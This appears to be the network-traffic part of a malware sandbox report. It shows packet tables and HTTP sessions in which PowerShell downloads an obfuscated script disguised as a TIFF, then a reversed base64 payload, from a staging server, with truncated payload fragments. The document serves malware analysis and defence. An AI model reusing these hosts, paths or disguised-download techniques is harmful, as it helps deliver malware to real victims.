Dec 2, 2024 07:38:31.429433107 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.429507017 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.431940079 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.431999922 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.432127953 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.434480906 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.434545040 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.434633970 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.437046051 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.437145948 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.437218904 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.439557076 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.439615965 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.439682961 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.442089081 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.442217112 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.442289114 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.444655895 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.444778919 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.444853067 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.447206020 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.447298050 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.447381020 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.449788094 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.449805975 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.449975014 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.452316046 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.452378988 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.452447891 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.454838037 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.454941988 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.455018997 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.457374096 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.457472086 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.457546949 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.459918976 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.460247040 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.460329056 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.462515116 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.462551117 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.462630033 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.515172958 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.515265942 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.515335083 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.516309977 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.516374111 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.516421080 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.518346071 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.518428087 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.518471956 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.545562029 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.545811892 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.545869112 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.546442032 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.546551943 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.546598911 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.548171043 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.548808098 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.548856020 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.548901081 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.550575018 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.550621033 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.550635099 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.552293062 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.552339077 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.552386999 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.553997040 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.554043055 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.554085016 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.555692911 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.555738926 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.555802107 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.557389021 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.557436943 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.557446957 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.559040070 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.559087992 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.559169054 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.560719013 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.560765982 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.560808897 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.562340021 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.562386990 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.562396049 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.564009905 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.564059973 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.564096928 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.565654039 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.565705061 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.565764904 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.567219973 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.567265034 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.567343950 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.568878889 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.568924904 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.568926096 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.570452929 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.570499897 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.570564985 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.572052956 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.572102070 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.572175980 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.573626995 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.573679924 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.573792934 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.574520111 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.574567080 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.574608088 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.575448990 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.575500011 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.575530052 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.576313972 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.576364994 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.576400042 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.577259064 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.577303886 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.577311039 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.578103065 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.578156948 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.578202009 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.578994036 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.579044104 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.579099894 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.579907894 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.579956055 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.580014944 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.580807924 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.580854893 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.580898046 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.581723928 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.581778049 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.581837893 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.582588911 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.582669020 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.707343102 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.707357883 CET	80	49773	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:31.707411051 CET	49773	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:31.757119894 CET	49773	80	192.168.2.10	146.70.113.200

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2024 07:38:05.711144924 CET	62697	53	192.168.2.10	1.1.1.1
Dec 2, 2024 07:38:06.116210938 CET	53	62697	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 2, 2024 07:38:05.711144924 CET	192.168.2.10	1.1.1.1	0x69c1	Standard query (0)	1016.filemail.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 2, 2024 07:38:06.116210938 CET	1.1.1.1	192.168.2.10	0x69c1	No error (0)	1016.filemail.com	ip.1016.filemail.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 2, 2024 07:38:06.116210938 CET	1.1.1.1	192.168.2.10	0x69c1	No error (0)	ip.1016.filemail.com		142.215.209.77	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

1016.filemail.com

146.70.113.200

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49704	146.70.113.200	80	7704	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 07:37:58.650535107 CET	317	OUT	GET /231/seethebestmagicalthignsgivegoodforu.tIF HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 146.70.113.200 Connection: Keep-Alive
Dec 2, 2024 07:38:00.234441996 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 06:37:59 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Mon, 02 Dec 2024 02:13:29 GMT ETag: "25b10-62840183b3eb7" Accept-Ranges: bytes Content-Length: 154384 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 51 00 6b 00 69 00 78 00 6d 00 57 00 4f 00 63 00 65 00 4b 00 4f 00 7a 00 61 00 55 00 69 00 20 00 3d 00 20 00 22 00 6a 00 57 00 57 00 4c 00 4e 00 71 00 4c 00 4c 00 5a 00 53 00 54 00 6a 00 4a 00 6e 00 68 00 22 00 0d 00 0a 00 68 00 4e 00 4c 00 57 00 64 00 69 00 6b 00 4c 00 6b 00 6a 00 55 00 70 00 65 00 50 00 4b 00 20 00 3d 00 20 00 22 00 50 00 43 00 6c 00 61 00 68 00 66 00 57 00 4c 00 64 00 7a 00 63 00 47 00 4c 00 4f 00 68 00 22 00 0d 00 0a 00 65 00 61 00 71 00 41 00 71 00 73 00 4b 00 57 00 4b 00 57 00 69 00 65 00 6d 00 68 00 43 00 20 00 3d 00 20 00 22 00 6f 00 4c 00 73 00 4f 00 6b 00 4e 00 41 00 74 00 6b 00 4c 00 4e 00 70 00 67 00 75 00 49 00 22 00 0d 00 0a 00 0d 00 0a 00 71 00 50 00 64 00 50 00 50 00 51 00 6d 00 74 00 78 00 57 00 42 00 52 00 6f 00 4c 00 57 00 20 00 3d 00 20 00 22 00 57 00 66 00 42 00 7a 00 52 00 6c 00 5a 00 63 00 57 00 55 00 4e 00 53 00 41 00 69 00 71 00 22 00 0d 00 0a 00 54 00 55 00 63 00 4e 00 69 00 65 00 4c 00 74 00 55 00 4c 00 [TRUNCATED] Data Ascii: QkixmWOceKOzaUi = "jWWLNqLLZSTjJnh"hNLWdikLkjUpePK = "PClahfWLdzcGLOh"eaqAqsKWKWiemhC = "oLsOkNAtkLNpguI"qPdPPQmtxWBRoLW = "WfBzRlZcWUNSAiq"TUcNieLtULzBiOA = "phLNmibONtoeUZP"BWnLtAubLWufcaG = "LcUnhLoknLLZGoT"NJzWWZfxLNWaZhA = "pGNpGCftHLehLKp"cehlPQPtkzSZkAe = "BKNiiKUqcWmBiec"bkovKLhKAPWKLKU = "liGldCfWBcecchz"UAuuBgsRLSQGQLH = "PWLkfKhhWAWgLLZ"uWkeiWiUKLhlWkq = "LWoTKBLQLobcxaG"KpmpKLLmiecivLL = "ZLKOqkfhueLBZQL"ONkCfh
Dec 2, 2024 07:38:00.234455109 CET	1236	IN	Data Raw: 00 4e 00 57 00 47 00 75 00 57 00 65 00 4c 00 57 00 54 00 20 00 3d 00 20 00 22 00 6b 00 57 00 4e 00 66 00 70 00 7a 00 4c 00 74 00 4f 00 4b 00 76 00 6c 00 4c 00 65 00 43 00 22 00 0d 00 0a 00 64 00 4b 00 6b 00 74 00 55 00 55 00 47 00 55 00 55 00 4a Data Ascii: NWGuWeLWT = "kWNfpzLtOKvlLeC"dKktUUGUUJJZRKU = "LkclfoccZcqbeLW"LriLUaxikmZWmWG = "GkNANzNHGfLCLIL"jkLqRKktmuCLUe
Dec 2, 2024 07:38:00.234467030 CET	1236	IN	Data Raw: 00 57 00 57 00 61 00 61 00 4a 00 7a 00 22 00 0d 00 0a 00 66 00 42 00 4b 00 4e 00 5a 00 70 00 5a 00 55 00 68 00 75 00 4e 00 75 00 66 00 69 00 7a 00 20 00 3d 00 20 00 22 00 55 00 66 00 4b 00 6b 00 51 00 41 00 41 00 62 00 4c 00 4c 00 6f 00 48 00 41 Data Ascii: WWaaJz"fBKNZpZUhuNufiz = "UfKkQAAbLLoHAjp"KUGiWCqWTofGaJU = "oekKcfzeWCBzctj"LLZczeBAeKGoAim = "UAooqLGzGLuLALL"i
Dec 2, 2024 07:38:00.234587908 CET	1236	IN	Data Raw: 00 72 00 6f 00 20 00 3d 00 20 00 22 00 65 00 50 00 6b 00 6d 00 47 00 5a 00 52 00 63 00 63 00 6e 00 75 00 67 00 48 00 61 00 57 00 22 00 0d 00 0a 00 68 00 65 00 6e 00 54 00 55 00 4c 00 78 00 61 00 73 00 78 00 43 00 72 00 43 00 57 00 78 00 20 00 3d Data Ascii: ro = "ePkmGZRccnugHaW"henTULxasxCrCWx = "KLicLLLaPiAWAkk"OZTPLNGvBhPJkHG = "mLzZpqlHLxfGAhe"LnioGzhZbKmfeiZ = "KBmt
Dec 2, 2024 07:38:00.234601974 CET	1236	IN	Data Raw: 00 4c 00 4b 00 4e 00 6e 00 47 00 64 00 66 00 6c 00 6f 00 57 00 7a 00 64 00 4b 00 76 00 55 00 20 00 3d 00 20 00 22 00 6e 00 4a 00 4e 00 4c 00 63 00 6d 00 65 00 43 00 6b 00 5a 00 66 00 6c 00 66 00 61 00 78 00 22 00 0d 00 0a 00 50 00 6d 00 5a 00 57 Data Ascii: LKNnGdfloWzdKvU = "nJNLcmeCkZflfax"PmZWGNkcbqkILKW = "jbiofmOvfRkLkGG"eiNLGlfjabmZpag = "eJcdALIWePxsaZd"ipesqZlL
Dec 2, 2024 07:38:00.234612942 CET	1236	IN	Data Raw: 00 63 00 57 00 75 00 50 00 61 00 53 00 76 00 63 00 4b 00 65 00 57 00 6e 00 22 00 0d 00 0a 00 71 00 69 00 70 00 4c 00 42 00 51 00 66 00 54 00 47 00 48 00 4c 00 74 00 71 00 74 00 55 00 20 00 3d 00 20 00 22 00 55 00 74 00 62 00 63 00 6f 00 4e 00 49 Data Ascii: cWuPaSvcKeWn"qipLBQfTGHLtqtU = "UtbcoNIpbRHskTc"LmctOzcKicLnctu = "OKWuKignhNNRALg"KAOtmhpUWlniUev = "KpjKLdLduZZGq
Dec 2, 2024 07:38:00.234625101 CET	1236	IN	Data Raw: 00 78 00 66 00 4c 00 62 00 68 00 55 00 41 00 4e 00 20 00 3d 00 20 00 22 00 75 00 78 00 41 00 69 00 57 00 72 00 53 00 55 00 50 00 63 00 69 00 61 00 42 00 4e 00 69 00 22 00 0d 00 0a 00 69 00 42 00 6b 00 4a 00 50 00 78 00 75 00 57 00 57 00 4e 00 4b Data Ascii: xfLbhUAN = "uxAiWrSUPciaBNi"iBkJPxuWWNKPraR = "gqGjRKpdvGPfLkc"mcKiWZOffKpicpZ = "ZzBWiOZoaopctCt"TOiqQjbhCGhfPNz =
Dec 2, 2024 07:38:00.234831095 CET	1236	IN	Data Raw: 00 57 00 63 00 64 00 22 00 0d 00 0a 00 4c 00 61 00 6e 00 4e 00 75 00 6c 00 49 00 57 00 6e 00 53 00 63 00 6e 00 4c 00 66 00 62 00 20 00 3d 00 20 00 22 00 69 00 4f 00 47 00 63 00 57 00 41 00 63 00 69 00 6b 00 41 00 6e 00 57 00 6c 00 73 00 50 00 22 Data Ascii: Wcd"LanNulIWnScnLfb = "iOGcWAcikAnWlsP"OukxkkuWKNIIiWW = "WWiiihGqoWZWboL"cLiehACLAUWrzGd = "lZZdHQLJkqKLLLn"cG
Dec 2, 2024 07:38:00.234842062 CET	1236	IN	Data Raw: 00 3d 00 20 00 22 00 61 00 63 00 47 00 65 00 57 00 4c 00 4b 00 71 00 76 00 49 00 6c 00 55 00 65 00 69 00 65 00 22 00 0d 00 0a 00 63 00 65 00 64 00 6c 00 57 00 65 00 75 00 76 00 4c 00 4c 00 69 00 4c 00 4e 00 6b 00 65 00 20 00 3d 00 20 00 22 00 48 Data Ascii: = "acGeWLKqvIlUeie"cedlWeuvLLiLNke = "HtWbjHctemAuCho"beOdhkGkWPiKIzu = "CLzmJqGWzhGzPdU"UzZUnsKzhLWkfkO = "LUoLiBf
Dec 2, 2024 07:38:00.234848976 CET	1236	IN	Data Raw: 00 47 00 69 00 53 00 47 00 76 00 62 00 6d 00 6d 00 67 00 67 00 6b 00 50 00 69 00 6b 00 20 00 3d 00 20 00 22 00 76 00 47 00 63 00 6e 00 66 00 68 00 75 00 52 00 55 00 6d 00 57 00 4b 00 55 00 5a 00 74 00 22 00 0d 00 0a 00 57 00 78 00 41 00 6d 00 57 Data Ascii: GiSGvbmmggkPik = "vGcnfhuRUmWKUZt"WxAmWLtckccIOaj = "cUHCWRWKLoHntKP"JiLdPmUjWLbLxGa = "LlukLJUiKLTAbtU"KWckGlvKULo
Dec 2, 2024 07:38:00.354475021 CET	1236	IN	Data Raw: 00 43 00 62 00 4f 00 70 00 68 00 69 00 41 00 57 00 4e 00 22 00 0d 00 0a 00 73 00 42 00 6d 00 66 00 4b 00 64 00 6d 00 57 00 4c 00 41 00 4c 00 6d 00 57 00 43 00 69 00 20 00 3d 00 20 00 22 00 47 00 71 00 50 00 50 00 7a 00 69 00 66 00 4b 00 6b 00 55 Data Ascii: CbOphiAWN"sBmfKdmWLALmWCi = "GqPPzifKkUmSsuG"hepxKRzkUGsLjbA = "GUoiPRLGhliWGec"catZpGWsjCpnRLo = "tqKCptpWsALiWt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49773	146.70.113.200	80	3520	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 07:38:28.893739939 CET	79	OUT	GET /231/ZAHHRZA.txt HTTP/1.1 Host: 146.70.113.200 Connection: Keep-Alive
Dec 2, 2024 07:38:30.433433056 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 06:38:29 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Mon, 02 Dec 2024 02:12:20 GMT ETag: "5daac-628401412802e" Accept-Ranges: bytes Content-Length: 383660 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Dec 2, 2024 07:38:30.433459997 CET	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEpp7KS2WZxCJ329lGN4VweCLUFW/Wh4luoNd1e5v2hr6Qkz0qTLRVkqBd8KF3WWrSLtEwm4IX7bs4m0
Dec 2, 2024 07:38:30.433470964 CET	448	IN	Data Raw: 70 4d 73 63 67 36 4a 33 55 4c 55 49 45 6d 43 6a 76 54 59 59 4c 72 78 55 69 70 65 4b 6e 66 75 55 6b 72 5a 56 37 41 37 50 42 55 44 78 74 73 38 59 38 70 73 34 64 78 39 79 58 45 59 2f 77 79 44 4b 79 7a 53 63 69 65 67 41 55 43 48 52 56 57 44 57 5a 72 Data Ascii: pMscg6J3ULUIEmCjvTYYLrxUipeKnfuUkrZV7A7PBUDxts8Y8ps4dx9yXEY/wyDKyzSciegAUCHRVWDWZrGpufitC4S8uopEI6vVXa4ncHAw/KL+9ua5KaWO1rLWXC8uoK3r0fIMHQSiP82zIsecP0EDEtlSTFsCZpWnL1iajJ1C3+18OShU0O3DXim/2hpHMBxmljN0lxw31HliJfN1xTvYbb3w/yVBGsReaQElZjx77L2tKne
Dec 2, 2024 07:38:30.433587074 CET	1236	IN	Data Raw: 49 67 72 45 50 4b 42 65 77 4a 56 7a 64 47 57 69 30 2b 4d 41 45 4b 70 44 33 33 62 51 68 2f 43 42 6c 53 43 2f 32 46 78 46 7a 59 55 2b 36 44 6b 43 6b 7a 71 76 61 41 51 68 70 41 67 6a 62 46 4d 67 39 39 78 33 55 46 62 48 78 6e 70 69 53 4f 2f 2b 4b 2b Data Ascii: IgrEPKBewJVzdGWi0+MAEKpD33bQh/CBlSC/2FxFzYU+6DkCkzqvaAQhpAgjbFMg99x3UFbHxnpiSO/+K+VwntI+7j+4aWrLlCoajHhGyJky/ww3iehPJz01dSYWvhIttlW+zU7AeuIMKuA66I1NC2CBUy0LF1sVb3gohfIOHJQa2AwQrGzpgT5XYD6EWPFwR7jkU82ycCILfCnL5w60rktljTAL5TWCjcFc5JKgOS6nXP9wkPJ
